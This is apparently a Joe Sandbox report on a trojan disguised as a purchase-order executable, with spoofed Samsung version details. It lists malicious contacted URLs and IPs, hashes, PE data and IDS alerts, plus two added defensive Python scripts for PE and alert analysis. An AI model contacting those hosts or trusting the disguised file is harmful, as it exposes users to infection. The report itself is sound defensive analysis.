http://www.allmm.info/igqu/?1b3H_Ni=4PnhXD1XQOAEhvyRg6knEMy8erSWBtwfFfVfV7Yg7HuI1lqkNO9tokZPvE8hw33lw/Tr&JXhpvv=OXXTgtL8CzU0PRx0 | true | Avira URL Cloud: malware | unknown
http://www.forbigdogs.com/igqu/?1b3H_Ni=hqyhMfRLrOIQC7GjaQnjrCruer7JrdNhQeLxI9U0LsQdDm7qZoXdq0VVbkb5+tb+Xu86&JXhpvv=OXXTgtL8CzU0PRx0 | true | Avira URL Cloud: malware | unknown
http://www.chemtradent.com/igqu/?1b3H_Ni=K/S7l+gZOJHSbd5nxE/i7D8w4PbP25DXYiwy4kAXmG/uB5hJOsw6W9LAHGkKev0TSo0+&JXhpvv=OXXTgtL8CzU0PRx0 | true | Avira URL Cloud: safe | unknown
http://www.theoutdoorbed.com/igqu/?1b3H_Ni=7TsZUea1gk4hSEvdc6EZbm1J0Wfs+lYlHRlJN5vF1TH1x8D6KkvV8DgWQzT8NLbVi8yc&JXhpvv=OXXTgtL8CzU0PRx0 | true | Avira URL Cloud: safe | unknown
http://www.pasumaisangam.com/igqu/?1b3H_Ni=cgoB+lenqGYlJtvc5JNC9VTF2CGbWvKagdSG/Om1O4x9+LG6GIhzUmnXZfPmgHDFLZxT&JXhpvv=OXXTgtL8CzU0PRx0 | true | Avira URL Cloud: safe | unknown
http://www.guidesgold.net/igqu/?1b3H_Ni=KYQlcl9vZGj8bR01lvQ9gDl5O0hjo7xV5yl6UTMOowrmblKr/7vG5jbVDjpERd28t5Sb&JXhpvv=OXXTgtL8CzU0PRx0 | true | Avira URL Cloud: safe | unknown
http://www.erpsystem.site/igqu/?1b3H_Ni=ZRPeOuYuFqwCE6hLODJInGZZul3mSlUAF2kmaH+TgtUwwh/GNGVQ9RWrqwSZOKD9NgnN&JXhpvv=OXXTgtL8CzU0PRx0 | true | Avira URL Cloud: safe | unknown
http://www.sweetbasilmarketing.com/igqu/?1b3H_Ni=YEhaVrRn7U1iAIlzVSLmJg7Vd2zqgykvRGHwZQMAJohu7B6Tc4aodga4QJg4WZr1G+1s&JXhpvv=OXXTgtL8CzU0PRx0 | true | Avira URL Cloud: safe | unknown
http://www.lotoencasa.com/igqu/?1b3H_Ni=xBkCUm8FF1kjoaFXSBT5hrl7iUeljBCg0asG3x/fx29GNVo3vuMsob2h52kMpeSzyrJ8&JXhpvv=OXXTgtL8CzU0PRx0 | true | Avira URL Cloud: safe | unknown

                                                          URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.apache.org/licenses/LICENSE-2.0 | explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp | false | - | high
http://www.fontbureau.com | explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp | false | - | high
http://www.fontbureau.com/designersG | explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp | false | - | high
http://www.fontbureau.com/designers/? | explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp | false | - | high
http://www.founder.com.cn/cn/bThe | explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers? | explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp | false | - | high
http://www.tiro.com | explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp | false | - | high
http://www.goodfont.co.kr | explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.coml | explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp | false | - | high
http://www.founder.com.cn/cn/cThe | explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://fontfabrik.com | explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn | explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-jones.html | explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp | false | - | high
http://www.jiyu-kobo.co.jp/ | explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp | false | - | high
http://www.fonts.com | explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp | false | - | high
http://www.sandoll.co.kr | explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Purchase Order 40,7045$.exe, 00000000.00000002.259984630.0000000002D51000.00000004.00000001.sdmp | false | - | high
http://www.sakkal.com | explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown

                                                                                Contacted IPs


                                                                                Public

IP | Domain | Country | ASN | ASN Name | Malicious
52.71.133.130 | unknown | United States | 14618 | AMAZON-AESUS | true
204.188.203.155 | unknown | United States | 46844 | ST-BGPUS | false
104.161.26.87 | unknown | United States | 53755 | IOFLOODUS | true
81.169.145.95 | unknown | Germany | 6724 | STRATOSTRATOAGDE | true
185.201.11.126 | unknown | Germany | 47583 | AS-HOSTINGERLT | true
34.102.136.180 | unknown | United States | 15169 | GOOGLEUS | true
3.127.175.50 | unknown | United States | 16509 | AMAZON-02US | true
45.194.171.26 | unknown | Seychelles | 134548 | DXTL-HKDXTLTseungKwanOServiceHK | true
198.54.117.211 | unknown | United States | 22612 | NAMECHEAP-NETUS | false
13.224.93.48 | unknown | United States | 16509 | AMAZON-02US | true
192.155.168.14 | unknown | United States | 132721 | PING-GLOBAL-ASPingGlobalAmsterdamPOPASNNL | true

                                                                                General Information

                                                                                Joe Sandbox Version: 31.0.0 Red Diamond
                                                                                Analysis ID: 321389
                                                                                Start date: 21.11.2020
                                                                                Start time: 09:21:29
                                                                                Joe Sandbox Product: CloudBasic
                                                                                Overall analysis duration: 0h 9m 20s
                                                                                Hypervisor based Inspection enabled: false
                                                                                Report type: light
                                                                                Sample file name: Purchase Order 40,7045$.exe
                                                                                Cookbook file name: default.jbs
                                                                                Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                Number of new started processes analysed: 25
                                                                                Number of new started drivers analysed: 0
                                                                                Number of existing processes analysed: 0
                                                                                Number of existing drivers analysed: 0
                                                                                Number of injected processes analysed: 1
                                                                                Technologies:
                                                                                • HCA enabled
                                                                                • EGA enabled
                                                                                • HDC enabled
                                                                                • AMSI enabled
                                                                                Analysis Mode: default
                                                                                Analysis stop reason: Timeout
                                                                                Detection: MAL
                                                                                Classification: mal100.troj.evad.winEXE@7/1@16/11
                                                                                EGA Information: Failed
                                                                                HDC Information:
                                                                                • Successful, ratio: 64.5% (good quality ratio 59.1%)
                                                                                • Quality average: 71%
                                                                                • Quality standard deviation: 31.6%
                                                                                HCA Information:
                                                                                • Successful, ratio: 100%
                                                                                • Number of executed functions: 0
                                                                                • Number of non-executed functions: 0
                                                                                Cookbook Comments:
                                                                                • Adjust boot time
                                                                                • Enable AMSI
                                                                                • Found application associated with file extension: .exe
                                                                                Warnings:
                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, HxTsr.exe, RuntimeBroker.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                                                • TCP Packets have been reduced to 100
                                                                                • Excluded IPs from analysis (whitelisted): 104.79.90.110, 168.61.161.212, 104.43.139.144, 51.104.139.180, 20.54.26.129, 51.103.5.159, 2.20.142.210, 2.20.142.209, 52.142.114.176, 92.122.213.247, 92.122.213.194
                                                                                • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wns.notify.windows.com.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, g-msn-com-nsatc.trafficmanager.net, par02p.wns.notify.windows.com.akadns.net, emea1.notify.windows.com.akadns.net, audownload.windowsupdate.nsatc.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, client.wns.windows.com, fs.microsoft.com, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net
                                                                                • VT rate limit hit for: /opt/package/joesandbox/database/analysis/321389/sample/Purchase Order 40,7045$.exe

                                                                                Simulations

                                                                                Behavior and APIs

                                                                                Time: 09:22:35
                                                                                Type: API Interceptor
                                                                                Description: 14x Sleep call for process: Purchase Order 40,7045$.exe modified

                                                                                Joe Sandbox View / Context

                                                                                IPs


                                                                                Domains


                                                                                ASN

                                                                                rm1E9ZjuNd.exeGet hashmaliciousBrowse
                                                                                • 67.21.94.15
                                                                                M11sVPvWUT.exeGet hashmaliciousBrowse
                                                                                • 204.188.203.155
                                                                                KWOgblwL7W.exeGet hashmaliciousBrowse
                                                                                • 104.160.174.172
                                                                                Img_0058714.exeGet hashmaliciousBrowse
                                                                                • 67.21.94.4
                                                                                file.exeGet hashmaliciousBrowse
                                                                                • 45.58.190.82
                                                                                toto.docGet hashmaliciousBrowse
                                                                                • 205.144.171.216

                                                                                JA3 Fingerprints

                                                                                No context

                                                                                Dropped Files

                                                                                No context

                                                                                Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Purchase Order 40,7045$.exe.log
Process: C:\Users\user\Desktop\Purchase Order 40,7045$.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1301
Entropy (8bit): 5.345637324625647
Encrypted: false
SSDEEP: 24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4VE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKz5
MD5: 6C42AAF2F2FABAD2BAB70543AE48CEDB
SHA1: 8552031F83C078FE1C035191A32BA43261A63DA9
SHA-256: 51D07DD061EA9665DA070B95A4AC2AC17E20524E30BF6A0DA8381C2AF29CA967
SHA-512: 014E89857B811765EA7AA0B030AB04A2DA1957571608C4512EC7662F6A4DCE8B0409626624DABC96CBFF079E7F0F4A916E6F49C789E00B6E46AD37C36C806DCA
Malicious: true
Reputation: moderate, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                                                                Static File Info

                                                                                General

File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.301138778689748
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 50.01%
• Win32 Executable (generic) a (10002005/4) 49.97%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: Purchase Order 40,7045$.exe
File size: 1269760
MD5: ba4f1b472cb69d8a3924d88dacf1b833
SHA1: 622cdccdc0f020d368a87c5eff9ec1a1259e21c7
SHA256: 2a694c3a8347816b2f85e036b1064e410ad1578185a0608416944199ef72b82c
SHA512: aa9ea518fcbf37fef007f984057bc076f93d355e43c29c6108e4146f69a45bb7d6857fc05d40476cee6604a349afef76258d1c7a19d33e451c0ff1236a1c13fd
SSDEEP: 12288:APJA0x88JYMuvkRTHqGSu5l6e57fet8LFjANtr227wl0m0mdPQN6Ys1UD5yuiCUA:APW07J0viTHpj66fa8dGBJs0m
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......_.................X...........v... ........@.. ....................................@................................

                                                                                File Icon

                                                                                Icon Hash:00828e8e8686b000

                                                                                Static PE Info

                                                                                General

Entrypoint: 0x53768e
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp: 0x5FB81EB6 [Fri Nov 20 19:53:26 2020 UTC]
TLS Callbacks:
CLR (.Net) Version: v4.0.30319
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
(The remaining 97 instructions of the preview all decode as `add byte ptr [eax], al`, which is what a disassembler produces for runs of 00 00 bytes: the entry point consists of the six-byte stub above followed by zero padding.)

                                                                                Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x137640 | 0x4b | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x138000 | 0x3d0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x13a000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                                                Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x135694 | 0x135800 | False | 0.590645193861 | data | 7.30520133301 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc | 0x138000 | 0x3d0 | 0x400 | False | 0.3935546875 | data | 3.18994060341 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x13a000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                Resources

Name | RVA | Size | Type | Language | Country
RT_VERSION | 0x138058 | 0x378 | data | |

                                                                                Imports

DLL | Import
mscoree.dll | _CorExeMain
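The static PE data above has a recognisable shape: the only import is mscoree.dll!_CorExeMain, the IAT directory is a single 8-byte slot at RVA 0x2000, the COM descriptor (CLR header) follows it at RVA 0x2008, and the entry point 0x53768e (image base 0x400000 plus RVA 0x13768e) is a `jmp dword ptr [00402000h]` through that IAT slot, which is the standard native stub of a .NET executable. The script below is an added example, not tooling from the report or the sandbox vendor: it walks the PE32 headers, maps the entry RVA through the section table, checks that the stub jumps into the IAT directory and that a CLR header is present, and computes the per-section Shannon entropy the report lists. Because the sample itself is not available offline, the PE it parses is constructed in `build_synthetic_pe` with the report's layout; that function and the `0x100` stub offset inside `.text` are assumptions for the example, not facts about the sample.

```python
"""Static checks for a PE32 image: managed-code entry stub, CLR header presence and
per-section Shannon entropy. Added example; the PE it parses is constructed below."""
import math
import struct

IAT_DIR, CLR_DIR = 12, 14   # data directory indexes: IAT and COM descriptor (CLR header)


def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte, the same measure the report gives per section."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_pe(image: bytes) -> dict:
    """Minimal PE32 header walk: entry RVA, image base, data directories, sections."""
    if image[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    nt = struct.unpack_from("<I", image, 0x3C)[0]
    if image[nt:nt + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = nt + 4
    num_sections = struct.unpack_from("<H", image, coff + 2)[0]
    opt_size = struct.unpack_from("<H", image, coff + 16)[0]
    opt = coff + 20
    if struct.unpack_from("<H", image, opt)[0] != 0x10B:
        raise ValueError("only PE32 (32-bit) images are handled here")
    entry_rva = struct.unpack_from("<I", image, opt + 16)[0]
    image_base = struct.unpack_from("<I", image, opt + 28)[0]
    num_dirs = struct.unpack_from("<I", image, opt + 92)[0]
    dirs = [struct.unpack_from("<II", image, opt + 96 + 8 * i) for i in range(num_dirs)]
    sections = []
    for i in range(num_sections):
        name, vsize, va, rsize, rptr = struct.unpack_from("<8sIIII", image, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode(), "va": va, "vsize": vsize,
                         "raw": image[rptr:rptr + rsize]})
    return {"entry_rva": entry_rva, "image_base": image_base, "dirs": dirs, "sections": sections}


def read_rva(pe: dict, rva: int, size: int) -> bytes:
    """Map an RVA to file bytes through the section table."""
    for s in pe["sections"]:
        if s["va"] <= rva < s["va"] + max(s["vsize"], len(s["raw"])):
            off = rva - s["va"]
            return s["raw"][off:off + size]
    raise ValueError(f"RVA {rva:#x} is not backed by any section")


def is_managed_stub(pe: dict) -> bool:
    """True when the entry point is 'FF 25 <abs addr>' (jmp dword ptr [addr]) whose target
    lies inside the IAT directory and a CLR header directory is present. In the report:
    entry 0x53768e, jmp [0x402000], IAT at RVA 0x2000 (8 bytes), CLR header at RVA 0x2008."""
    stub = read_rva(pe, pe["entry_rva"], 6)
    if len(stub) < 6 or stub[:2] != b"\xff\x25":
        return False
    target = struct.unpack_from("<I", stub, 2)[0]
    iat_rva, iat_size = pe["dirs"][IAT_DIR]
    clr_rva, clr_size = pe["dirs"][CLR_DIR]
    lo = pe["image_base"] + iat_rva
    return lo <= target < lo + iat_size and clr_rva != 0 and clr_size >= 0x48


def section_entropies(pe: dict) -> dict:
    return {s["name"]: shannon_entropy(s["raw"]) for s in pe["sections"]}


def build_synthetic_pe(stub: bytes = b"\xff\x25\x00\x20\x40\x00") -> bytes:
    """Constructed PE32 with the report's layout: image base 0x400000, one .text section at
    RVA 0x2000 holding the IAT slot, the CLR header and (assumed offset 0x100) the entry
    stub. Only the fields parse_pe reads are meaningful; it is not a loadable binary."""
    image_base, text_rva, entry_off = 0x400000, 0x2000, 0x100
    text = bytearray(0x200)
    text[entry_off:entry_off + len(stub)] = stub
    dirs = [(0, 0)] * 16
    dirs[IAT_DIR] = (text_rva, 8)
    dirs[CLR_DIR] = (text_rva + 8, 0x48)
    opt = struct.pack("<HBBIIIIIIIIIHHHHHHIIIIHHIIIIII",
                      0x10B, 0, 0, len(text), 0, 0, text_rva + entry_off, text_rva, 0,
                      image_base, 0x1000, 0x200, 4, 0, 0, 0, 4, 0,
                      0, 0x4000, 0x200, 0, 2, 0x8540,
                      0x100000, 0x1000, 0x100000, 0x1000, 0, len(dirs))
    opt += b"".join(struct.pack("<II", *d) for d in dirs)
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, len(opt), 0x0102)
    sect = struct.pack("<8sIIIIIIHHI", b".text", len(text), text_rva, len(text), 0x200,
                       0, 0, 0, 0, 0x60000020)
    headers = bytearray(0x200)
    headers[:2] = b"MZ"
    headers[0x3C:0x40] = struct.pack("<I", 0x80)
    nt = b"PE\0\0" + coff + opt + sect
    headers[0x80:0x80 + len(nt)] = nt
    return bytes(headers + text)


if __name__ == "__main__":
    pe = parse_pe(build_synthetic_pe())
    print("managed stub:", is_managed_stub(pe), "entropy:", section_entropies(pe))
```

Run against the real file, `is_managed_stub` returning True only says the entry point is the CLR loader stub, as for any .NET executable; the signal in this report is the combination with a 7.3-entropy `.text` section that holds the whole 1.2 MB of the file, which is what packed or encrypted payloads inside an otherwise tiny managed wrapper look like.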

                                                                                Version Infos

Description | Data
Translation | 0x0000 0x04b0
LegalCopyright | Copyright Samsung Group
Assembly Version | 4.2.20072.4
InternalName | s.exe
FileVersion | 4.2.20072.4
CompanyName | Samsung Group
LegalTrademarks |
Comments |
ProductName | Samsung Smart Switch
ProductVersion | 4.2.20072.4
FileDescription | Samsung Smart Switch
OriginalFilename | s.exe

                                                                                Network Behavior

                                                                                Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
11/21/20-09:23:33.695125 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49747 | 34.102.136.180 | 192.168.2.5
11/21/20-09:24:22.422576 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49756 | 34.102.136.180 | 192.168.2.5
11/21/20-09:24:33.074023 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49758 | 34.102.136.180 | 192.168.2.5
11/21/20-09:24:38.388168 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49759 | 34.102.136.180 | 192.168.2.5
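The four alerts share one remote host (34.102.136.180, port 80) and four different ephemeral client ports, i.e. four separate short HTTP connections each answered with a 403, while the TCP packet list that follows shows only port-443 traffic to two other hosts. Tying each alert back to the flow that produced it is the first step in separating the interesting traffic from sandbox background noise. The script below is an added example, not part of the report: it normalises packets from either direction into a (local port, remote IP, remote port) flow, joins the Snort rows to flows on that key, and summarises per remote endpoint. The records are copied from this report's tables except the two port-80 packets, which are constructed (the printed packet list is cut off before that traffic), and the column layout with `|` separators is an assumption of the example.

```python
"""Correlate sandbox IDS alerts with the TCP flows that produced them. Added example;
records are copied from the report's tables or constructed where marked."""
from dataclasses import dataclass, field

LOCAL_HOST = "192.168.2.5"   # the analysis VM in this report

# Columns: timestamp | source port | dest port | source IP | dest IP.
# First five rows are from the report's TCP packet list; the last two are constructed,
# because the list as printed stops before the port-80 traffic the alerts refer to.
TCP_PACKETS = """\
Nov 21, 2020 09:22:33.260705948 CET | 49720 | 443 | 192.168.2.5 | 104.42.151.234
Nov 21, 2020 09:22:53.097776890 CET | 49695 | 443 | 192.168.2.5 | 20.190.129.133
Nov 21, 2020 09:22:53.134103060 CET | 443 | 49695 | 20.190.129.133 | 192.168.2.5
Nov 21, 2020 09:22:53.137559891 CET | 49730 | 443 | 192.168.2.5 | 20.190.129.133
Nov 21, 2020 09:22:53.173620939 CET | 443 | 49730 | 20.190.129.133 | 192.168.2.5
Nov 21, 2020 09:23:33.600000000 CET | 49747 | 80 | 192.168.2.5 | 34.102.136.180
Nov 21, 2020 09:23:33.695125000 CET | 80 | 49747 | 34.102.136.180 | 192.168.2.5
"""

# Snort rows copied from the report: timestamp | proto | SID | message | sport | dport | src | dst
SNORT_ALERTS = """\
11/21/20-09:23:33.695125 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49747 | 34.102.136.180 | 192.168.2.5
11/21/20-09:24:22.422576 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49756 | 34.102.136.180 | 192.168.2.5
"""


@dataclass
class Flow:
    local_port: int
    remote_ip: str
    remote_port: int
    out_pkts: int = 0
    in_pkts: int = 0
    alerts: list = field(default_factory=list)


def flow_key(sport: int, dport: int, sip: str, dip: str):
    """Normalise a packet seen in either direction to (local port, remote ip, remote port)."""
    if sip == LOCAL_HOST:
        return (sport, dip, dport), "out"
    if dip == LOCAL_HOST:
        return (dport, sip, sport), "in"
    raise ValueError(f"{sip}->{dip}: neither side is the analysis host")


def build_flows(packet_text: str) -> dict:
    """One Flow per (local port, remote ip, remote port), with per-direction packet counts."""
    flows = {}
    for line in packet_text.splitlines():
        _, sport, dport, sip, dip = (f.strip() for f in line.split("|"))
        key, direction = flow_key(int(sport), int(dport), sip, dip)
        flow = flows.setdefault(key, Flow(*key))
        if direction == "out":
            flow.out_pkts += 1
        else:
            flow.in_pkts += 1
    return flows


def attach_alerts(flows: dict, alert_text: str) -> list:
    """Join each alert to its flow on the same 3-tuple; return the keys of alerts that
    matched no flow (here: a 403 whose packets lie beyond the truncated list)."""
    unmatched = []
    for line in alert_text.splitlines():
        ts, _, sid, msg, sport, dport, sip, dip = (f.strip() for f in line.split("|"))
        key, _ = flow_key(int(sport), int(dport), sip, dip)
        if key in flows:
            flows[key].alerts.append((ts, int(sid), msg))
        else:
            unmatched.append(key)
    return unmatched


def remote_summary(flows: dict) -> dict:
    """Per remote endpoint: (number of local connections, number of attached alerts).
    An endpoint whose every connection drew an alert stands out from the 443 endpoints
    that drew none."""
    summary = {}
    for f in flows.values():
        conns, alerts = summary.get((f.remote_ip, f.remote_port), (0, 0))
        summary[(f.remote_ip, f.remote_port)] = (conns + 1, alerts + len(f.alerts))
    return summary


if __name__ == "__main__":
    flows = build_flows(TCP_PACKETS)
    print("alerts without a flow:", attach_alerts(flows, SNORT_ALERTS))
    for endpoint, (conns, alerts) in remote_summary(flows).items():
        print(endpoint, conns, "connections,", alerts, "alerts")
```

The unmatched list is worth keeping rather than discarding: an alert with no flow in the capture means the packet list and the IDS log were cut at different points, which is exactly the situation in this report's truncated tables.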

                                                                                Network Port Distribution

                                                                                TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 21, 2020 09:22:33.260705948 CET | 49720 | 443 | 192.168.2.5 | 104.42.151.234
Nov 21, 2020 09:22:53.097776890 CET | 49695 | 443 | 192.168.2.5 | 20.190.129.133
Nov 21, 2020 09:22:53.097862959 CET | 49695 | 443 | 192.168.2.5 | 20.190.129.133
Nov 21, 2020 09:22:53.134103060 CET | 443 | 49695 | 20.190.129.133 | 192.168.2.5
Nov 21, 2020 09:22:53.137559891 CET | 49730 | 443 | 192.168.2.5 | 20.190.129.133
Nov 21, 2020 09:22:53.173620939 CET | 443 | 49730 | 20.190.129.133 | 192.168.2.5
Nov 21, 2020 09:22:53.173751116 CET | 49730 | 443 | 192.168.2.5 | 20.190.129.133
Nov 21, 2020 09:22:53.174362898 CET | 49730 | 443 | 192.168.2.5 | 20.190.129.133
Nov 21, 2020 09:22:53.211704016 CET | 443 | 49730 | 20.190.129.133 | 192.168.2.5
Nov 21, 2020 09:22:53.211775064 CET | 443 | 49730 | 20.190.129.133 | 192.168.2.5
Nov 21, 2020 09:22:53.211826086 CET | 443 | 49730 | 20.190.129.133 | 192.168.2.5
Nov 21, 2020 09:22:53.211858988 CET | 49730 | 443 | 192.168.2.5 | 20.190.129.133
Nov 21, 2020 09:22:53.211911917 CET | 443 | 49730 | 20.190.129.133 | 192.168.2.5
Nov 21, 2020 09:22:53.211981058 CET | 49730 | 443 | 192.168.2.5 | 20.190.129.133
Nov 21, 2020 09:22:53.217577934 CET | 49730 | 443 | 192.168.2.5 | 20.190.129.133
